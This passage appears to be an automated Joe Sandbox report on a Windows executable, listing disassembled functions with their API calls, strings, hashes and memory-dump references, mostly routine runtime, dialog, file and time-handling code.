                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                                                  • String ID: $%s:$CAPTION$d
                                                                                                  • API String ID: 2407758923-2512411981
                                                                                                  • Opcode ID: f2692b77b5bbc2d729a0bf237b4a43241336938d43f518de3389ab0178a5f7aa
                                                                                                  • Instruction ID: f5a4540608d631eec6b8769a986474294e8efe10b9111485b7cac707b655e538
                                                                                                  • Opcode Fuzzy Hash: f2692b77b5bbc2d729a0bf237b4a43241336938d43f518de3389ab0178a5f7aa
                                                                                                  • Instruction Fuzzy Hash: 9781A172208301AFD710DFA8CC89B6FBBE9EBC9704F05491DFA84D7291D670E9058B52
                                                                                                  Function 0092CB22 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___free_lconv_mon.LIBCMT ref: 0092CB66
                                                                                                    • Part of subcall function 0092C701: _free.LIBCMT ref: 0092C71E
                                                                                                    • Part of subcall function 0092C701: _free.LIBCMT ref: 0092C730
                                                                                                    • Part of subcall function 0092C701: _free.LIBCMT ref: 0092C742
                                                                                                    • Part of subcall function 0092C701: _free.LIBCMT ref: 0092C754
                                                                                                    • Part of subcall function 0092C701: _free.LIBCMT ref: 0092C766
                                                                                                    • Part of subcall function 0092C701: _free.LIBCMT ref: 0092C778
                                                                                                    • Part of subcall function 0092C701: _free.LIBCMT ref: 0092C78A
                                                                                                    • Part of subcall function 0092C701: _free.LIBCMT ref: 0092C79C
                                                                                                    • Part of subcall function 0092C701: _free.LIBCMT ref: 0092C7AE
                                                                                                    • Part of subcall function 0092C701: _free.LIBCMT ref: 0092C7C0
                                                                                                    • Part of subcall function 0092C701: _free.LIBCMT ref: 0092C7D2
                                                                                                    • Part of subcall function 0092C701: _free.LIBCMT ref: 0092C7E4
                                                                                                    • Part of subcall function 0092C701: _free.LIBCMT ref: 0092C7F6
                                                                                                  • _free.LIBCMT ref: 0092CB5B
                                                                                                    • Part of subcall function 00928DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0092C896,?,00000000,?,00000000,?,0092C8BD,?,00000007,?,?,0092CCBA,?), ref: 00928DE2
                                                                                                    • Part of subcall function 00928DCC: GetLastError.KERNEL32(?,?,0092C896,?,00000000,?,00000000,?,0092C8BD,?,00000007,?,?,0092CCBA,?,?), ref: 00928DF4
                                                                                                  • _free.LIBCMT ref: 0092CB7D
                                                                                                  • _free.LIBCMT ref: 0092CB92
                                                                                                  • _free.LIBCMT ref: 0092CB9D
                                                                                                  • _free.LIBCMT ref: 0092CBBF
                                                                                                  • _free.LIBCMT ref: 0092CBD2
                                                                                                  • _free.LIBCMT ref: 0092CBE0
                                                                                                  • _free.LIBCMT ref: 0092CBEB
                                                                                                  • _free.LIBCMT ref: 0092CC23
                                                                                                  • _free.LIBCMT ref: 0092CC2A
                                                                                                  • _free.LIBCMT ref: 0092CC47
                                                                                                  • _free.LIBCMT ref: 0092CC5F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                  • String ID:
                                                                                                  • API String ID: 161543041-0
                                                                                                  • Opcode ID: f5b9bd3a773884e02ff67a92464f3f3aad85c18690c882da7965be31f790bf1d
                                                                                                  • Instruction ID: fba22cfdc55da538721b906f0235554e7e69d5daf7f066059cf12e480f3a05db
                                                                                                  • Opcode Fuzzy Hash: f5b9bd3a773884e02ff67a92464f3f3aad85c18690c882da7965be31f790bf1d
                                                                                                  • Instruction Fuzzy Hash: AB315CB16013259FEB20AA39F84AB5B77E9AF50310F104829F588D72EADF31EC44CB10
                                                                                                  Function 00919711 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 126memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _wcslen.LIBCMT ref: 00919736
                                                                                                  • _wcslen.LIBCMT ref: 009197D6
                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 009197E5
                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00919806
                                                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0091982D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                                                                  • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                                  • API String ID: 1777411235-4209811716
                                                                                                  • Opcode ID: d584f2cc77995d7c34e4ef05edba716b40e3fc258b5fde179723d280f29b218b
                                                                                                  • Instruction ID: faec5ac2021f7462bf821570fde8b7987d62cffebe2a8e719aa53384de189b4a
                                                                                                  • Opcode Fuzzy Hash: d584f2cc77995d7c34e4ef05edba716b40e3fc258b5fde179723d280f29b218b
                                                                                                  • Instruction Fuzzy Hash: AA3148326083157BE725AF60AC06FABB79CDFC2314F15411DF501A61D2EB64DA4887A6
                                                                                                  Function 0091D69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetWindow.USER32(?,00000005), ref: 0091D6C1
                                                                                                  • GetClassNameW.USER32(00000000,?,00000800), ref: 0091D6ED
                                                                                                    • Part of subcall function 00911FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0090C116,00000000,.exe,?,?,00000800,?,?,?,00918E3C), ref: 00911FD1
                                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 0091D709
                                                                                                  • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0091D720
                                                                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 0091D734
                                                                                                  • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0091D75D
                                                                                                  • DeleteObject.GDI32(00000000), ref: 0091D764
                                                                                                  • GetWindow.USER32(00000000,00000002), ref: 0091D76D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                                                  • String ID: STATIC
                                                                                                  • API String ID: 3820355801-1882779555
                                                                                                  • Opcode ID: d3ef743173f75f1cd3fa0262ea1bcb8277320ff73fea1b24b4ff45469fe5eef8
                                                                                                  • Instruction ID: a1cb973fccf1a481b6b385c41ffe8146a0ecbff625c32ad086c585115079fd73
                                                                                                  • Opcode Fuzzy Hash: d3ef743173f75f1cd3fa0262ea1bcb8277320ff73fea1b24b4ff45469fe5eef8
                                                                                                  • Instruction Fuzzy Hash: 131106B270A3187BE2216B709C4AFEF765CAF84751F018124FA51E20D1DBA48F8956B5
                                                                                                  Function 009296F1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _free.LIBCMT ref: 00929705
                                                                                                    • Part of subcall function 00928DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0092C896,?,00000000,?,00000000,?,0092C8BD,?,00000007,?,?,0092CCBA,?), ref: 00928DE2
                                                                                                    • Part of subcall function 00928DCC: GetLastError.KERNEL32(?,?,0092C896,?,00000000,?,00000000,?,0092C8BD,?,00000007,?,?,0092CCBA,?,?), ref: 00928DF4
                                                                                                  • _free.LIBCMT ref: 00929711
                                                                                                  • _free.LIBCMT ref: 0092971C
                                                                                                  • _free.LIBCMT ref: 00929727
                                                                                                  • _free.LIBCMT ref: 00929732
                                                                                                  • _free.LIBCMT ref: 0092973D
                                                                                                  • _free.LIBCMT ref: 00929748
                                                                                                  • _free.LIBCMT ref: 00929753
                                                                                                  • _free.LIBCMT ref: 0092975E
                                                                                                  • _free.LIBCMT ref: 0092976C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 776569668-0
                                                                                                  • Opcode ID: 2510855600809939dba548b4cd3497b26337c9ea76378d8bba4b9bbb310dda13
                                                                                                  • Instruction ID: c7f5468ad535f16c6c4a455a7cf30af762b2c5bce077393eeedf2aaf14b8d3c0
                                                                                                  • Opcode Fuzzy Hash: 2510855600809939dba548b4cd3497b26337c9ea76378d8bba4b9bbb310dda13
                                                                                                  • Instruction Fuzzy Hash: 64110436101119BFDB01EF54E846EDA3BB9EF54350F0058A0FA088F2B6DE32DA549B84
                                                                                                  Function 00922E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                                                  • String ID: csm$csm$csm
                                                                                                  • API String ID: 322700389-393685449
                                                                                                  • Opcode ID: 7c5a4fb8cda7ec69a1bc747a460815058493fa4715ff934789b0c3d5296d279f
                                                                                                  • Instruction ID: c0ea30f57443745f013a61c372f4ee736173e3a8302ffc34e7c0692a0d08864e
                                                                                                  • Opcode Fuzzy Hash: 7c5a4fb8cda7ec69a1bc747a460815058493fa4715ff934789b0c3d5296d279f
                                                                                                  • Instruction Fuzzy Hash: B1B1AF71800229EFCF25DFA4E941AAEBBB9FF44310F148159F8016B25AD739DA61CF91
                                                                                                  Function 00906FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __EH_prolog.LIBCMT ref: 00906FAA
                                                                                                  • _wcslen.LIBCMT ref: 00907013
                                                                                                  • _wcslen.LIBCMT ref: 00907084
                                                                                                    • Part of subcall function 00907A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00907AAB
                                                                                                    • Part of subcall function 00907A9C: GetLastError.KERNEL32 ref: 00907AF1
                                                                                                    • Part of subcall function 00907A9C: CloseHandle.KERNEL32(?), ref: 00907B00
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                                                                  • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                  • API String ID: 3122303884-3508440684
                                                                                                  • Opcode ID: ac0f227fc071fa370e144713367f121ea548080862b44783d4e80c6c01d9d09a
                                                                                                  • Instruction ID: 194c8aaf5ac25a6c545c97c8df18eaa485caeafddd872fe4fd5ed874bf188dab
                                                                                                  • Opcode Fuzzy Hash: ac0f227fc071fa370e144713367f121ea548080862b44783d4e80c6c01d9d09a
                                                                                                  • Instruction Fuzzy Hash: 1241E6B1D08344BEEB20E7B49C82FEEB76C9F84324F004555FA55A61C2D674BA888B61
                                                                                                  Function 0091B5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 00901316: GetDlgItem.USER32(00000000,00003021), ref: 0090135A
                                                                                                    • Part of subcall function 00901316: SetWindowTextW.USER32(00000000,009335F4), ref: 00901370
                                                                                                  • EndDialog.USER32(?,00000001), ref: 0091B610
                                                                                                  • SendMessageW.USER32(?,00000080,00000001,?), ref: 0091B637
                                                                                                  • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0091B650
                                                                                                  • SetWindowTextW.USER32(?,?), ref: 0091B661
                                                                                                  • GetDlgItem.USER32(?,00000065), ref: 0091B66A
                                                                                                  • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0091B67E
                                                                                                  • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0091B694
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                                  • String ID: LICENSEDLG
                                                                                                  • API String ID: 3214253823-2177901306
                                                                                                  • Opcode ID: a86b4856583affc7eb32783675b90846c5e5cc46834373724e88279ce192084b
                                                                                                  • Instruction ID: 970d22f769ceb5b8b81b42f2d56cfec65aff166a4cf1ef378fdcb54a1ab33386
                                                                                                  • Opcode Fuzzy Hash: a86b4856583affc7eb32783675b90846c5e5cc46834373724e88279ce192084b
                                                                                                  • Instruction Fuzzy Hash: 6E21F93172C208BBD2115F76ED49FBB3B6EEB57BA1F014018F641D10A0CB969941B731
                                                                                                  Function 0091FD10 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,5F585B47,00000001,00000000,00000000,?,?,0090AF6C,ROOT\CIMV2), ref: 0091FD99
                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,0090AF6C,ROOT\CIMV2), ref: 0091FE14
                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 0091FE1F
                                                                                                  • _com_issue_error.COMSUPP ref: 0091FE48
                                                                                                  • _com_issue_error.COMSUPP ref: 0091FE52
                                                                                                  • GetLastError.KERNEL32(80070057,5F585B47,00000001,00000000,00000000,?,?,0090AF6C,ROOT\CIMV2), ref: 0091FE57
                                                                                                  • _com_issue_error.COMSUPP ref: 0091FE6A
                                                                                                  • GetLastError.KERNEL32(00000000,?,?,0090AF6C,ROOT\CIMV2), ref: 0091FE80
                                                                                                  • _com_issue_error.COMSUPP ref: 0091FE93
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                                  • String ID:
                                                                                                  • API String ID: 1353541977-0
                                                                                                  • Opcode ID: a4f201209b4e6cd6eea139fc87d5be9327e04af0df4d2ebf72be354debc8209e
                                                                                                  • Instruction ID: 139a1aa6baeeef173c4bb610c6fb22ee5dc897fa4de98f4395984d36fc5fd73f
                                                                                                  • Opcode Fuzzy Hash: a4f201209b4e6cd6eea139fc87d5be9327e04af0df4d2ebf72be354debc8209e
                                                                                                  • Instruction Fuzzy Hash: F2410A75B0021DABD710DF64DC55BEFBBA8EB84710F108239F909E7291D73499808BE0
                                                                                                  Function 0090AF24 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 210COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: H_prolog
                                                                                                  • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                                                  • API String ID: 3519838083-3505469590
                                                                                                  • Opcode ID: 229550acf5c0efb8b68e0c81d192c86be1507b0d9622f21e3d33c327f8285247
                                                                                                  • Instruction ID: c39e731134d23da0cd96513f4cde2d33929be61f05c6470a454588f4b75eb213
                                                                                                  • Opcode Fuzzy Hash: 229550acf5c0efb8b68e0c81d192c86be1507b0d9622f21e3d33c327f8285247
                                                                                                  • Instruction Fuzzy Hash: 2F715A71A00219AFDB14DFA4CC95AAFB7B9FF88714B14455DE512A72A0CB30AE41DF60
                                                                                                  Function 00909382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __EH_prolog.LIBCMT ref: 00909387
                                                                                                  • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 009093AA
                                                                                                  • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 009093C9
                                                                                                    • Part of subcall function 0090C29A: _wcslen.LIBCMT ref: 0090C2A2
                                                                                                    • Part of subcall function 00911FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0090C116,00000000,.exe,?,?,00000800,?,?,?,00918E3C), ref: 00911FD1
                                                                                                  • _swprintf.LIBCMT ref: 00909465
                                                                                                    • Part of subcall function 00904092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 009040A5
                                                                                                  • MoveFileW.KERNEL32(?,?), ref: 009094D4
                                                                                                  • MoveFileW.KERNEL32(?,?), ref: 00909514
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                                                                  • String ID: rtmp%d
                                                                                                  • API String ID: 3726343395-3303766350
                                                                                                  • Opcode ID: bcb72d43cd9d3c4cbbaa84be61487cb36d4df526a69a4d0f28f20b3e887b8d66
                                                                                                  • Instruction ID: b7f7bb2126d2d39f4c0afa2919079991f13c2657f3a96edde39f41bed9c6c687
                                                                                                  • Opcode Fuzzy Hash: bcb72d43cd9d3c4cbbaa84be61487cb36d4df526a69a4d0f28f20b3e887b8d66
                                                                                                  • Instruction Fuzzy Hash: 8A4154B19042596EDF21AB61CC45FDE737CAF85344F0048A5BA49E3092DB388BC9DF60
                                                                                                  Function 00911218 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __aulldiv.LIBCMT ref: 0091122E
                                                                                                    • Part of subcall function 0090B146: GetVersionExW.KERNEL32(?), ref: 0090B16B
                                                                                                  • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00911251
                                                                                                  • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00911263
                                                                                                  • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00911274
                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00911284
                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00911294
                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 009112CF
                                                                                                  • __aullrem.LIBCMT ref: 00911379
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                                  • String ID:
                                                                                                  • API String ID: 1247370737-0
                                                                                                  • Opcode ID: 7101a72946e90196454d2647a166ed48bb6b305df3a18d2cdfe02c0c74c0af26
                                                                                                  • Instruction ID: 8d30b11147bd1f3e74b72918472cedda55c5daff2324fb9762e811e10f45dce7
                                                                                                  • Opcode Fuzzy Hash: 7101a72946e90196454d2647a166ed48bb6b305df3a18d2cdfe02c0c74c0af26
                                                                                                  • Instruction Fuzzy Hash: A041F8B1548309AFC714DF65C8849ABBBE9FF88314F00892EF596C2650E738E649DF51
                                                                                                  Function 00902210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _swprintf.LIBCMT ref: 00902536
